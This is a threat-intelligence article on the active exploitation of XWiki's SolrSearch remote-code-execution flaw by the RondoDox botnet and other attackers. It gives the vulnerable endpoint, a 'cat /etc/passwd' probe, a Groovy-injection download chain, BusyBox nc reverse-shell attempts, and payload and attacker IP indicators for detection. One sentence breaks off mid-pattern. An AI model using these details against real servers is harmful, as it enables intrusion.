A critical security vulnerability in the XWiki Platform, tracked as CVE-2025-24893, is now being actively exploited by the RondoDox botnet malware, marking a significant escalation in a widespread attack campaign that also involves cryptocurrency miners and hands-on-keyboard attackers. The remote code execution flaw, which affects the platform’s `SolrSearch` feature, allows unauthenticated attackers to execute arbitrary code on unpatched servers. According to VulnCheck, exploitation attempts surged dramatically in early November 2025, with sharp peaks recorded on November 7 and 11, indicating broad scanning and attacks from multiple, independent threat actors2. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the vulnerability to its Known Exploited Vulnerabilities catalog on October 30, 2025, setting a patching deadline of November 20 for federal agencies1.
The situation exemplifies the challenges of modern patch management, as a vulnerability patched by XWiki maintainers in February 2025 is driving record exploitation surges nine months later8. The RondoDox botnet was first observed exploiting CVE-2025-24893 on November 3, 2025, and its operators have since begun renting out access to the compromised servers, creating a profitable botnet-for-rent service9. This rapid weaponization and monetization, occurring within approximately one week of the botnet’s adoption of the exploit, highlights the narrow window defenders have to respond to emerging threats.
Vulnerability Overview and Attack Mechanism
CVE-2025-24893 is an eval injection vulnerability in the XWiki Platform’s `SolrSearch` feature with a CVSS score of 9.8. The flaw allows unauthenticated guest users to execute arbitrary code on unpatched servers by sending a crafted request to the `/bin/get/Main/SolrSearch` endpoint. Affected versions include all releases prior to 15.10.11, 16.4.1, and 16.5.0RC1. The vulnerability was patched by XWiki maintainers in late February 2025, but many servers remain unpatched, creating a large attack surface for threat actors1, 8.
The exploitation chain typically involves injecting a Groovy script through the vulnerable endpoint. This script is used to fetch and execute a first-stage shell script from a payload server. For the RondoDox botnet, the initial payload is often downloaded from an IP address such as `74.194.191.52`2, 5. This script then downloads and installs the full RondoDox malware. The attack does not require authentication, making it particularly dangerous for exposed XWiki instances. Evidence suggests initial in-the-wild exploitation began as early as March 2025, shortly after the patch was released8.
Security researchers have observed multiple exploitation patterns, including the use of public Nuclei templates that attempt to execute basic commands like `cat /etc/passwd` to confirm successful exploitation1, 2. Other attackers use out-of-band application security testing (OAST) services like `oast.fun` to identify vulnerable systems discreetly. The simplicity of the exploit, combined with the availability of public proof-of-concept code, has contributed to the rapid adoption by multiple threat groups.
Diverse Threat Actor Landscape
The exploitation of CVE-2025-24893 is no longer limited to a single threat group. The attacker set has diversified to include botnets, cryptocurrency miners, and actors using custom tooling for hands-on-keyboard attacks2. The RondoDox botnet campaign aims to recruit compromised servers into a distributed denial-of-service (DDoS) network, but has expanded its business model to include renting out access to these compromised systems to other cybercriminals9. This botnet-for-rent service represents an advanced, service-oriented criminal model that increases the overall threat level.
RondoDox attacks are easily identifiable through the botnet’s well-known HTTP User-Agent string `Mozilla/5.0 ([email protected])` and its distinctive payload naming convention using the pattern `rondo.
Perhaps more concerning are the hands-on-keyboard activities observed. An AWS-associated IP (`18.228.3.224`) with no prior abuse history attempted to establish a reverse shell using BusyBox `nc`, suggesting a potential targeted attack rather than automated crimeware2, 4. Another reverse shell attempt originated from `118.99.141.178`, a host likely already compromised by CVE-2023-47218 that exposed QNAP and DrayTek interfaces, indicating attackers are using breached devices as launch points for further attacks. This diversity of motives—from DDoS and mining to potential espionage—makes CVE-2025-24893 a high-value target for multiple criminal operations.
Detection and Mitigation Strategies
Organizations running XWiki instances should immediately upgrade to versions 15.10.11, 16.4.1, or 16.5.0RC1 or later. For systems that cannot be patched immediately, network monitoring should be implemented to detect and block HTTP requests to the `/bin/get/Main/SolrSearch` endpoint containing Groovy code execution patterns. Security teams should also leverage indicators of compromise from these campaigns, including RondoDox’s distinctive User-Agent string and known payload server IPs like `74.194.191.52`5, 8.
Intrusion detection systems should be configured to monitor for the specific exploitation patterns and subsequent payload downloads associated with these campaigns. As noted by Purple Ops, organizations should implement intrusion detection systems specifically tuned to identify these attack patterns8. Security teams should assume compromise for any unpatched XWiki systems and check for signs of infection, including unexpected processes, coin miners, or outgoing connections to the documented command and control servers.
The rapid escalation of this threat highlights the critical need for effective patch management processes. The fact that a vulnerability patched in February 2025 is driving significant exploitation in November demonstrates a substantial gap in security hygiene across many organizations. As one analysis noted, “By the time an issue lands in CISA KEV, attackers are already days ahead,” emphasizing the need for early-warning threat intelligence to level the playing field2, 3. Organizations should review their patch management lifecycle to reduce the time between vendor patches and production deployment.
The exploitation of CVE-2025-24893 by the RondoDox botnet and other threat actors represents a classic case of vulnerability weaponization in the modern threat landscape. The rapid escalation from targeted exploitation to widespread attacks, combined with the diversification of attacker motives and the emergence of a botnet-for-rent service, demonstrates how quickly threats can evolve. This incident serves as a reminder that effective security requires not just timely patching but also robust monitoring, threat intelligence integration, and assumption that determined attackers will quickly weaponize any available vulnerability. The continued exploitation of this flaw months after a patch became available highlights persistent challenges in cybersecurity hygiene that organizations must address to protect their infrastructure.
